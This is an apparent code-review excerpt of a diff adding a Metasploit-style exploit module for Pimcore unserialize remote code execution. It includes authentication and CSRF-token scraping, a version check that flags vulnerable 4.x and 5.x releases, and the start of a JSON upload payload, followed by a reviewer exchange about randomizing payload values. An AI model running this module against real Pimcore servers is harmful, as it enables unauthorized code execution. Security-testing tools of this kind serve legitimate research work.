modules/exploits/multi/http/pimcore_unserialize_rce.rb

```diff
@@ -0,0 +1,264 @@
+      uri = target_uri.path + 'admin/?_dc=' + res.headers['Location'].scan(/\/admin\/\?_dc=([0-9]+)/).flatten.first.to_s
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(uri),
+        'cookie' => res.get_cookies
+      )
+
+      if res && res.code == 200
+        # Pimcore 5.x
+        # Tested on 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0
+        unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
+          datastore['csrfToken'] = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
+          datastore['cookies'] = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0] + ' pimcore_admin_sid=1;'
+
+          # Version
+          version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
+          build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
+          print_status("Pimcore version: #{version}")
+          print_status("Pimcore build: #{build}")
+          if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')
+            print_good("The target is vulnerable!")
+            return targets[0]
+          else
+            return nil
+          end
+        end
+
+        # Pimcore 4.x
+        # Tested on 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0
+        unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
+          datastore['csrfToken'] = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
+          datastore['cookies'] = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
+
+          # Version
+          version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
+          build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
+          print_status("Pimcore version: #{version}")
+          print_status("Pimcore build: #{build}")
+          if Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')
+            print_good("The target is vulnerable!")
+            return targets[1]
+          else
+            return nil
+          end
+        end
+
+        return nil
+
+      else
+        # non è un corretto dire qua auth unsuccessful
+        fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+      end
+    end
+
+    if res.code == 302 && res.headers['Location'] =~ /auth_failed=true/
+      fail_with(Failure::NoAccess, 'Invalid credentials')
+    end
+
+    fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+  end
+
+  def upload
+    # JSON file payload
+    fpayload = "{\"customlayout\":[{\"creationDate\": \"1\", \"modificationDate\": \"2\", \"userOwner\": \"3\", \"userModification\": \"4\"}]}"
```

Comment:
Do these values matter? Could they be randomized?

Reply:
The only important thing is "customlayout" and the JSON structure so yes, they can be randomized.